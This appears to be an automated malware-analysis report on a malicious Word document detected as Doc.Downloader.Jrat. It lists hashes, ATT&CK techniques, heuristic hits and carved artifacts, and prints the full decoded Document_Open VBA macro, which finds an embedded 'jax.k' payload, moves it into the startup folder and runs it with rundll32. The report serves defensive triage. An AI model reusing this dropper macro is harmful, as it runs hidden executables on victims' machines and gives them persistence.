Doc.Downloader.Jrat-6336393-1 Office (OLE) malware analysis — malicious · c29b1cab77fd8a6a

MALICIOUS

Office (OLE)

1.27 MB Created: 2021-05-24 12:28:00 Authoring application: Microsoft Office Word First seen: 2021-06-13

MD5: ca999f765f35d0988e451960ca718714 SHA-1: dc53cfd966ce979c80a170b3e8ce3eac48f50332 SHA-256: c29b1cab77fd8a6ae8cea0795a39167b90fa78381ddb92016c6612b1d8ec272d

530 Risk Score

Malware Insights

Doc.Downloader.Jrat-6336393-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1071.001 Web Protocols T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that is configured to execute. This macro attempts to locate a file named 'jax.k', rename it to 'ket.t' in the startup directory, and then execute it using 'rundll32.exe'. The presence of an embedded PE executable and the ClamAV detection name 'Doc.Downloader.Jrat-6336393-1' strongly indicate a downloader or dropper functionality.

Heuristics 14

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
```

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
   Set FSO = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1535 bytes
SHA-256: `5e458372b4eacd99b55dfb9dd878b8d73a6d16041b2f88dd89494ac82a5a6488`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Compare Text Option Explicit Dim pafs As String Private Sub Document_Open() Dim uis As String uis = Options.DefaultFilePath(wdStartupPath) If Dir(uis & "\ket.t") = "" Then Call yyy Call xxx If pafs = "" Then Else Dim iel As String Dim ued As String ued = ".exe" iel = Options.DefaultFilePath(wdStartupPath) Name pafs As iel & "\ket.t" Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX") End If End If End Sub Sub xxx() Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath)) End Sub Sub yyy() Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Selection.Copy End Sub Sub Search(mds As Object) Dim Mysob As Object Dim Fil As Object For Each Mysob In mds.SubFolders Search Mysob Next Mysob For Each Fil In mds.Files If Fil.Name = "jax.k" Then pafs = Fil End If Next Fil Exit Sub ErrHandle: Err.Clear End Sub
`embedded_office_0008f668.exe`	embedded-pe	Office MZ+PE at offset 0x8F668	748440 bytes
SHA-256: `ece6f048dba84b9c3bda01679bc7a12de032ba3b9b4295265433c563e67c6aa9`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1683339287/Ole10Native	721178 bytes
SHA-256: `179a6087ccdf242416537dc8c851e489a00cf7da8f951eed54bf22f326a252f9`
`ole10native_00_jax.k`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1683339287/Ole10Native; display_name=jax.k; full_path=C:\Users\MyPc\AppData\Local\Temp\jax.k; temp_path=; def_file=	720896 bytes
SHA-256: `5fd6d4de1030418e65a24b64e301d3a086e62c3ef2348c79c5a32e2cb307128a`

Open this report in the interactive analyzer, or submit your own file for analysis.